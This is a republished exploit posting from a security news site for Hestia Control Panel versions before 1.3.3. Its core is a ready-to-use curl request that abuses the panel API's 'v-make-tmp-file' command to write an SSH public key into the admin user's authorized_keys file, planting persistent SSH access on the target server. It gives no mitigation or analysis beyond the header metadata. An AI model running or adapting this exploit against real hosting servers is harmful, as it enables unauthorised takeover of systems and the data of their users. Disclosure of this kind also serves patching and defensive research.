Hestia Control Panel 1.3.2 Arbitrary File Write ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on March 19th, 2021 📆 | 6510 Views ⚑

0

Hestia Control Panel 1.3.2 Arbitrary File Write ≈ Packet Storm

# Title: Hestia Control Panel 1.3.2 - Arbitrary File Write
# Date: 07.03.2021
# Author: Numan Türle
# Vendor Homepage: https://hestiacp.com/
# Software Link: https://github.com/hestiacp/hestiacp
# Version: < 1.3.3
# Tested on: HestiaCP Version 1.3.2

curl --location --request POST 'https://TARGET:8083/api/index.php'
--form 'hash="HERE_API_KEY"'
--form 'returncode="yes"'
--form 'cmd="v-make-tmp-file"'
--form 'arg1="ssh-rsa HERE_KEY"'
--form 'arg2="/home/admin/.ssh/authorized_keys"'
--form 'arg3=""'
--form 'arg4=""'
--form 'arg5=""'

Source link

Tagged with:



Leave a Reply